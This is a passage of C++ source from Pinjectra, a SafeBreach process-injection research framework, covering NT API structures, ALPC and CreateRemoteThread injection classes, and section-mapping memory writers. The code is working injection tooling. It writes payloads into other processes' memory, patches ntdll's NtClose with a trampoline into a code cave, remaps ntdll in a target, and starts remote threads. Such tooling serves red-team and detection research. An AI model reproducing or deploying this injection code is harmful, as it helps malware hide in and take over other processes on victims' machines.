104 | SystemRangeStartInformation = 50,
105 | SystemVerifierInformation = 51,
106 | SystemVerifierThunkExtend = 52,
107 | SystemSessionProcessInformation = 53,
108 | SystemLoadGdiDriverInSystemSpace = 54,
109 | SystemNumaProcessorMap = 55,
110 | SystemPrefetcherInformation = 56,
111 | SystemExtendedProcessInformation = 57,
112 | SystemRecommendedSharedDataAlignment = 58,
113 | SystemComPlusPackage = 59,
114 | SystemNumaAvailableMemory = 60,
115 | SystemProcessorPowerInformation = 61,
116 | SystemEmulationBasicInformation = 62,
117 | SystemEmulationProcessorInformation = 63,
118 | SystemExtendedHandleInformation = 64,
119 | SystemLostDelayedWriteInformation = 65,
120 | SystemBigPoolInformation = 66,
121 | SystemSessionPoolTagInformation = 67,
122 | SystemSessionMappedViewInformation = 68,
123 | SystemHotpatchInformation = 69,
124 | SystemObjectSecurityMode = 70,
125 | SystemWatchdogTimerHandler = 71,
126 | SystemWatchdogTimerInformation = 72,
127 | SystemLogicalProcessorInformation = 73,
128 | SystemWow64SharedInformation = 74,
129 | SystemRegisterFirmwareTableInformationHandler = 75,
130 | SystemFirmwareTableInformation = 76,
131 | SystemModuleInformationEx = 77,
132 | SystemVerifierTriageInformation = 78,
133 | SystemSuperfetchInformation = 79,
134 | SystemMemoryListInformation = 80,
135 | SystemFileCacheInformationEx = 81,
136 | MaxSystemInfoClass = 82 // MaxSystemInfoClass should always be the last enum
137 |
138 | } SYSTEM_INFORMATION_CLASS;
139 |
140 | typedef enum _OBJECT_INFORMATION_CLASS {
141 | ObjectBasicInformation,
142 | ObjectTypeInformation
143 | } OBJECT_INFORMATION_CLASS;
144 |
145 | // this structure is derived from TP_CALLBACK_ENVIRON_V3,
146 | // but also includes two additional values. one to hold
147 | // the callback function and the other is a callback parameter
148 | typedef struct _TP_CALLBACK_ENVIRONX {
149 | DWORD64 Version;
150 | DWORD64 Pool;
151 | DWORD64 CleanupGroup;
152 | DWORD64 CleanupGroupCancelCallback;
153 | DWORD64 RaceDll;
154 | DWORD64 ActivationContext;
155 | DWORD64 FinalizationCallback;
156 | DWORD64 Flags;
157 | DWORD64 CallbackPriority;
158 | DWORD64 Size;
159 | DWORD64 Callback;
160 | DWORD64 CallbackParameter;
161 | } TP_CALLBACK_ENVIRONX, * PTP_CALLBACK_ENVIRONX;
162 |
163 | typedef VOID* POBJECT;
164 |
165 | typedef struct _SYSTEM_HANDLE {
166 | ULONG uIdProcess;
167 | UCHAR ObjectType; // OB_TYPE_* (OB_TYPE_TYPE, etc.)
168 | UCHAR Flags; // HANDLE_FLAG_* (HANDLE_FLAG_INHERIT, etc.)
169 | USHORT Handle;
170 | POBJECT pObject;
171 | ACCESS_MASK GrantedAccess;
172 | } SYSTEM_HANDLE, * PSYSTEM_HANDLE;
173 |
174 | typedef struct _SYSTEM_HANDLE_INFORMATION
175 | {
176 | ULONG HandleCount;
177 | SYSTEM_HANDLE Handles[1];
178 | } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
179 |
180 | typedef struct _UNICODE_STRING {
181 | USHORT Length;
182 | USHORT MaximumLength;
183 | PWSTR Buffer;
184 | } UNICODE_STRING, * PUNICODE_STRING;
185 |
186 | typedef struct _OBJECT_NAME_INFORMATION
187 | {
188 | UNICODE_STRING Name;
189 | } OBJECT_NAME_INFORMATION, * POBJECT_NAME_INFORMATION;
190 |
191 | typedef struct
192 | {
193 | HANDLE hp;
194 | std::vector ports;
195 | DWORD pid;
196 | BYTE* payload;
197 | DWORD64 payloadSize;
198 | } process_info;
199 |
200 | typedef struct _tp_param_t {
201 | DWORD64 Callback;
202 | DWORD64 CallbackParameter;
203 | } tp_param;
204 |
205 | // Classes
206 | class CodeViaALPC :
207 | public ExecutionTechnique
208 | {
209 | public:
210 | // Constructor & Destructor
211 | CodeViaALPC(AdvanceMemoryWriter* memwriter)
212 | :m_memwriter(memwriter) { }
213 | ~CodeViaALPC();
214 |
215 | // Methods
216 | boolean inject(DWORD pid, DWORD tid);
217 |
218 | private:
219 | // Methods
220 | BOOL IsValidCBE(HANDLE hProcess, PTP_CALLBACK_ENVIRONX cbe);
221 | DWORD64 GetALPCPorts(process_info* pi);
222 | BOOL ALPC_Connect(std::wstring path);
223 | BOOL ALPC_deploy(process_info* pi, LPVOID ds, PTP_CALLBACK_ENVIRONX cbe);
224 | BOOL FindCallback(process_info* pi, LPVOID BaseAddress, SIZE_T RegionSize);
225 | BOOL ScanProcess(process_info* pi);
226 |
227 | protected:
228 | // Members
229 | AdvanceMemoryWriter* m_memwriter;
230 |
231 | };
232 |
233 |
--------------------------------------------------------------------------------
/Pinjector/Adapters.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include "WritingTechniques.h"
32 |
33 | //////////////////////////////////////////
34 | // ComplexToAdvanceMemoryWriter Adapter //
35 | //////////////////////////////////////////
36 |
37 | ComplexToMutableAdvanceMemoryWriter::~ComplexToMutableAdvanceMemoryWriter() {
38 |
39 | }
40 |
41 | PINJECTRA_PACKET* ComplexToMutableAdvanceMemoryWriter::eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params) {
42 | PINJECTRA_PACKET* payload_output;
43 | RUNTIME_MEM_ENTRY* writer_output;
44 |
45 | // Evaulate Payload
46 | payload_output = this->m_payload->eval(params);
47 |
48 | // Update Writer
49 | this->m_writer->SetBuffer(payload_output->buffer);
50 | this->m_writer->SetBufferSize(payload_output->buffer_size);
51 |
52 | // Write!
53 | writer_output = this->m_writer->writeto(target->process, 0);
54 |
55 | // Hijack Payload Output
56 | free(payload_output->buffer);
57 | payload_output->buffer = writer_output->addr;
58 | payload_output->buffer_size = writer_output->tot_write;
59 |
60 | return payload_output;
61 | }
62 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_NUVOS_NMVOS.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include
32 |
33 | #include
34 |
35 | #include "CFMA_MVOF_NUVOS_NMVOS.h"
36 |
37 | #include "ntapi.h"
38 |
39 | static NTSTATUS(*PNtMapViewOfSection)(
40 | HANDLE SectionHandle,
41 | HANDLE ProcessHandle,
42 | PVOID* BaseAddress,
43 | ULONG_PTR ZeroBits,
44 | SIZE_T CommitSize,
45 | PLARGE_INTEGER SectionOffset,
46 | PSIZE_T ViewSize,
47 | SECTION_INHERIT InheritDisposition,
48 | ULONG AllocationType,
49 | ULONG Win32Protect
50 | );
51 |
52 | static NTSTATUS(*PNtUnmapViewOfSection)(
53 | HANDLE ProcessHandle,
54 | PVOID BaseAddress);
55 |
56 | /////////////
57 | // Classes //
58 | /////////////
59 |
60 | CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection::~CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection()
61 | {
62 | }
63 |
64 | PINJECTRA_PACKET* CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection::eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params)
65 | {
66 | HANDLE p = target->process;
67 | PINJECTRA_PACKET* payload_output;
68 | PNtMapViewOfSection = (NTSTATUS(*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");
69 | PNtUnmapViewOfSection = (NTSTATUS(*)(HANDLE SectionHandle, HANDLE ProcessHandle))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
70 |
71 | // Evaluate Payload
72 | payload_output = this->m_dynamic_payload->eval(params);
73 | TStrDWORD64Map& tMetadata = *payload_output->metadata;
74 | void *target_cave = (void *)tMetadata["TARGET_CAVE"];
75 | void *target_fcn = (void *)tMetadata["TARGET_FUNCTION"];
76 | char *trampo = (char *)tMetadata["TRAMPO"];
77 | char *target_mod = (char *)tMetadata["TARGET"];
78 |
79 | MODULEINFO modinfo;
80 | GetModuleInformation(GetCurrentProcess(), GetModuleHandleA((char *)target_mod), &modinfo, sizeof(modinfo));
81 | int size = modinfo.SizeOfImage;
82 |
83 | HANDLE fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, size, NULL);
84 | //printf("Handle (fm): %p\n", fm);
85 |
86 | char* map_addr = (char*)MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
87 | //printf("map address: %p\n", map_addr);
88 |
89 | __int64 actually_read = 0;
90 | ReadProcessMemory(p, GetModuleHandleA((char *)target_mod), map_addr, size, (SIZE_T*)& actually_read);
91 | if (actually_read != size)
92 | {
93 | printf("OOOPS: actually read: %lld, expecting %d\n", actually_read, size);
94 | }
95 | assert(target_fcn == GetProcAddress(GetModuleHandleA("ntdll"), "NtClose"));
96 | assert(target_cave == GetProcAddress(GetModuleHandleA("ntdll"), "atan"));
97 | memcpy(map_addr + (__int64)target_cave - (__int64)GetModuleHandleA((char *)target_mod), payload_output->buffer, payload_output->buffer_size);
98 | memcpy(map_addr + (__int64)target_fcn - (__int64)GetModuleHandleA((char *)target_mod), trampo, 12);
99 | LPVOID lpMap = GetModuleHandleA((char *)target_mod);
100 | SIZE_T viewsize = 0;
101 |
102 | (*PNtUnmapViewOfSection)(p, lpMap);
103 |
104 | (*PNtMapViewOfSection)(fm, p, &lpMap, 0, size, nullptr, &viewsize, ViewUnmap, 0, PAGE_EXECUTE_READWRITE); // "The default behavior for executable pages allocated is to be marked valid call targets for CFG." (https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-mapviewoffile)
105 | //printf("Section mapped to %p in target process, %lld bytes\n", lpMap, viewsize);
106 |
107 | FlushInstructionCache(p, lpMap, size);
108 |
109 | return payload_output;
110 | }
111 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_NUVOS_NMVOS.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | #define _CRT_SECURE_NO_WARNINGS
34 | #include
35 | #include
36 | #include
37 | #include
38 |
39 | #include "WritingTechniques.h"
40 |
41 | #include "ntapi.h"
42 |
43 | // Classes
44 | class CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection :
45 | public ComplexMemoryWriter
46 | {
47 | public:
48 | // Constructor & Destructor
49 | CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection(DynamicPayload* dynamic_payload) :
50 | m_dynamic_payload(dynamic_payload) { }
51 |
52 | ~CreateFileMappingA_MapViewOfFile_NtUnmapViewOfSection_NtMapViewOfSection();
53 |
54 | // Methods
55 | PINJECTRA_PACKET* eval_and_write(TARGET_PROCESS* target, TStrDWORD64Map& params);
56 |
57 | protected:
58 | // Members
59 | DynamicPayload* m_dynamic_payload;
60 | };
61 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_OP_PNMVOS.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include
32 |
33 | #include "CFMA_MVOF_OP_PNMVOS.h"
34 |
35 | #include "ntapi.h"
36 |
37 | static NTSTATUS(*PNtMapViewOfSection)(
38 | HANDLE SectionHandle,
39 | HANDLE ProcessHandle,
40 | PVOID* BaseAddress,
41 | ULONG_PTR ZeroBits,
42 | SIZE_T CommitSize,
43 | PLARGE_INTEGER SectionOffset,
44 | PSIZE_T ViewSize,
45 | SECTION_INHERIT InheritDisposition,
46 | ULONG AllocationType,
47 | ULONG Win32Protect
48 | );
49 |
50 | /////////////
51 | // Classes //
52 | /////////////
53 |
54 | CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection::~CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection()
55 | {
56 | }
57 |
58 | RUNTIME_MEM_ENTRY* CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection::write(DWORD pid, DWORD tid)
59 | {
60 | RUNTIME_MEM_ENTRY* ret_entry;
61 | HANDLE fm;
62 | char* map_addr;
63 | HANDLE hProcess;
64 | LPVOID lpMap = 0;
65 | SIZE_T viewsize = 0;
66 | PNtMapViewOfSection = (NTSTATUS(*)(HANDLE SectionHandle, HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, SECTION_INHERIT InheritDisposition, ULONG AllocationType, ULONG Win32Protect))GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtMapViewOfSection");
67 |
68 | fm = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_EXECUTE_READWRITE, 0, this->m_nbyte, NULL);
69 |
70 | map_addr = (char*)MapViewOfFile(fm, FILE_MAP_ALL_ACCESS, 0, 0, 0);
71 |
72 | memcpy(map_addr, this->m_buf, this->m_nbyte);
73 |
74 | hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, pid);
75 |
76 | (*PNtMapViewOfSection)(fm, hProcess, &lpMap, 0, this->m_nbyte, nullptr, &viewsize, ViewUnmap, 0, PAGE_EXECUTE_READWRITE); // "The default behavior for executable pages allocated is to be marked valid call targets for CFG." (https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-mapviewoffile)
77 |
78 | // Fill in
79 | ret_entry = (RUNTIME_MEM_ENTRY*)malloc(sizeof(RUNTIME_MEM_ENTRY));
80 |
81 | if (ret_entry == NULL)
82 | return NULL;
83 |
84 | ret_entry->thread = NULL;
85 | ret_entry->process = hProcess;
86 | ret_entry->addr = map_addr;
87 | ret_entry->entry_point = lpMap;
88 |
89 | return ret_entry;
90 | }
91 |
--------------------------------------------------------------------------------
/Pinjector/CFMA_MVOF_OP_PNMVOS.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Local Include's
34 | #include "WritingTechniques.h"
35 |
36 | #include "ntapi.h"
37 |
38 | // Classes
39 | class CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection :
40 | public SimpleMemoryWriter
41 | {
42 | public:
43 | // Constructor & Destructor
44 | CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection(void* buf, size_t nbyte)
45 | :m_buf(buf), m_nbyte(nbyte) { }
46 | ~CreateFileMappingA_MapViewOfFile_OpenProcess_PNtMapViewOfSection();
47 |
48 | // Methods
49 | RUNTIME_MEM_ENTRY* write(DWORD pid, DWORD tid);
50 |
51 | protected:
52 | // Members
53 | void* m_buf;
54 | size_t m_nbyte;
55 | };
56 |
--------------------------------------------------------------------------------
/Pinjector/CreateRemoteThread.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #include "CreateRemoteThread.h"
32 |
33 | CodeViaCreateRemoteThread::~CodeViaCreateRemoteThread()
34 | {
35 | }
36 |
37 | boolean CodeViaCreateRemoteThread::inject(DWORD pid, DWORD tid) {
38 |
39 | RUNTIME_MEM_ENTRY* result = this->m_memwriter->write(pid, tid);
40 |
41 | // User didn't override Entry Point? Use Writer's one!
42 | if (this->m_entry_point == NULL)
43 | this->m_entry_point = result->entry_point;
44 |
45 | HANDLE injected_thread = CreateRemoteThread(result->process,
46 | NULL,
47 | 0, (LPTHREAD_START_ROUTINE)this->m_entry_point,
48 | result->addr,
49 | 0, NULL);
50 |
51 | return injected_thread == NULL;
52 | }
53 |
--------------------------------------------------------------------------------
/Pinjector/CreateRemoteThread.h:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
19 | // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
20 | // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
21 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
22 | // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
23 | // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
24 | // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
25 | // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 |
28 | // AUTHORS: Amit Klein, Itzik Kotler
29 | // SEE: https://github.com/SafeBreach-Labs/Pinjectra
30 |
31 | #pragma once
32 |
33 | // Local Include's
34 | #include "ExecutionTechnique.h"
35 | #include "WritingTechniques.h"
36 |
37 | // Classes
38 | class CodeViaCreateRemoteThread :
39 | public ExecutionTechnique
40 | {
41 | public:
42 | // Constructor & Destructor
43 | CodeViaCreateRemoteThread(SimpleMemoryWriter* memwriter, void *entry = NULL)
44 | :m_memwriter(memwriter), m_entry_point(entry) {}
45 | ~CodeViaCreateRemoteThread();
46 |
47 | // Methods
48 | boolean inject(DWORD pid, DWORD tid);
49 |
50 | protected:
51 | // Members
52 | SimpleMemoryWriter* m_memwriter;
53 | void* m_entry_point;
54 | };
55 |
56 |
--------------------------------------------------------------------------------
/Pinjector/CtrlInject.cpp:
--------------------------------------------------------------------------------
1 | // Copyright (c) 2019, SafeBreach
2 | // All rights reserved.
3 | //
4 | // Redistribution and use in source and binary forms, with or without
5 | // modification, are permitted provided that the following conditions are met:
6 | //
7 | // * Redistributions of source code must retain the above copyright notice,
8 | // this list of conditions and the following disclaimer.
9 | // * Redistributions in binary form must reproduce the above copyright
10 | // notice, this list of conditions and the following disclaimer in the
11 | // documentation and/or other materials provided with the distribution.
12 | // * Neither the name of the copyright holder nor the names of its
13 | // contributors may be used to endorse or promote products derived from
14 | // this software without specific prior written permission.
15 | //
16 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
